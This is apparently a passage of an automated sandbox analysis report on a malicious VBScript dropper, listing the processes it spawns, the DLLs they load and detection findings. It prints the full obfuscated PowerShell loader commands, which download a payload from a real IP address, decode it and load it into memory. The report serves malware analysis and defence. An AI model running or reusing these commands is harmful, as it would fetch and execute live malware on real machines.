Jw?k?CQ?Jw?s?Cc?QQ?n?Ck?I??p?C??OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?G0?cQBv?G4?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?C??JwBk?EE?Qg?0?EE?S?BR?EE?T?Bn?EI?MgBB?Ec?O?BB?GI?ZwBB?DU?QQBE?EU?QQBj?Hc?QgB2?EE?S?BN?EE?T?B3?EI?egBB?Ec?UQBB?Fk?UQBC?HY?QQBH?Hc?QQBi?Gc?Qg?z?EE?Rw?4?EE?WgBB?EE?dgBB?EQ?awBB?E0?UQBC?Gw?QQBI?Ek?QQBZ?Gc?QgB0?EE?RwBV?EE?YQBR?EI?MgBB?Ec?O?BB?GI?ZwBB?HY?QQBD?D??QQBM?FE?QQ?y?EE?R?Bj?EE?TgBR?EE?M?BB?Eg?SQBB?GI?dwBC?D??QQBH?E0?QQBa?FE?QgBv?EE?Qw?4?EE?WgB3?EI?eQBB?Ec?O?BB?Ew?ZwBC?D??QQBH?FU?QQBh?Hc?QgBq?EE?S?BV?EE?WQBn?EI?M?BB?Ec?awBB?Fk?ZwBB?HY?QQBD?Dg?QQBP?Gc?QgB6?EE?S?BB?EE?Z?BB?EI?M?BB?Ec?ZwBB?Cc?I??s?C??J?Bi?H??dgBy?HY?I??s?C??JwBf?F8?XwBf?F8?cwBj?HM?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Hg?awBs?Gw?a??s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?C??Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand IAAkAEMAWQByAEoAUAAgAD0AIAAoACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAIAApACAAOwAkAGcARwBpAG0AQQAgAD0AIAAoACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABDAFkAcgBKAFAAIAApACAAOwAgAA== -inputFormat xml -outputFormat text	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winnsi.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Found suspicious powershell code related to unpacking or dynamic code loading

Source: sostener.vbs

Static file information: File size 3462610 > 1048576

Data Obfuscation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??WwBT?Hk?cwB0?GU?bQ?u?Ek?Tw?u?F??YQB0?Gg?XQ?6?Do?RwBl?HQ?V?Bl?G0?c?BQ?GE?d?Bo?Cg?KQ?g?Cs?I??n?GQ?b?Bs?D??MQ?u?HQ?e?B0?Cc?I??p?C??OwBJ?G4?dgBv?Gs?ZQ?t?Fc?ZQBi?FI?ZQBx?HU?ZQBz?HQ?I??t?FU?UgBJ?C??J?BD?EM?UgBo?G0?I??t?E8?dQB0?EY?aQBs?GU?I??k?EM?WQBy?Eo?U??g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?I?Bw?G8?dwBl?HI?cwBo?GU?b?Bs?C4?ZQB4?GU?I??t?GM?bwBt?G0?YQBu?GQ?I?B7?C??J?BD?Fk?cgBK?F??I??9?C??K??g?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?C??KQ?g?Ds?J?Bn?Ec?aQBt?EE?I??9?C??K??g?Ec?ZQB0?C0?QwBv?G4?d?Bl?G4?d??g?C0?U?Bh?HQ?a??g?CQ?QwBZ?HI?SgBQ?C??KQ?g?Ds?I?B9?C??Ow?k?Hg?awBs?Gw?a??g?D0?I??n?D??Jw?g?Ds?J?Bi?H??dgBy?HY?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?bQBx?G8?bgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?EM?WQBy?Eo?U??g?Ck?LgBy?GU?c?Bs?GE?YwBl?Cg?Jw?k?CQ?Jw?s?Cc?QQ?n?Ck?I??p?C??OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?G0?cQBv?G4?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?C??JwBk?EE?Qg?0?EE?S?BR?EE?T?Bn?EI?MgBB?Ec?O?BB?GI?ZwBB?DU?QQBE?EU?QQBj?Hc?QgB2?EE?S?BN?EE?T?B3?EI?egBB?Ec?UQBB?Fk?UQBC?HY?QQBH?Hc?QQBi?Gc?Qg?z?EE?Rw?4?EE?WgBB?EE?dgBB?EQ?awBB?E0?UQBC?Gw?QQBI?Ek?QQBZ?Gc?QgB0?EE?RwBV?EE?YQBR?EI?MgBB?Ec?O?BB?GI?ZwBB?HY?QQBD?D??QQBM?FE?QQ?y?EE?R?Bj?EE?TgBR?EE?M?BB?Eg?SQBB?GI?dwBC?D??QQBH?E0?QQBa?FE?QgBv?EE?Qw?4?EE?WgB3?EI?eQBB?Ec?O?BB?Ew?ZwBC?D??QQBH?FU?QQBh?Hc?QgBq?EE?S?BV?EE?WQBn?EI?M?BB?Ec?awBB?Fk?ZwBB?HY?QQBD?Dg?QQBP?Gc?QgB6?EE?S?BB?EE?Z?BB?EI?M?BB?Ec?ZwBB?Cc?I??s?C??J?Bi?H??dgBy?HY?I??s?C??JwBf?F8?XwBf?F8?cwBj?HM?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Hg?awBs?Gw?a??s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?C??Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;"
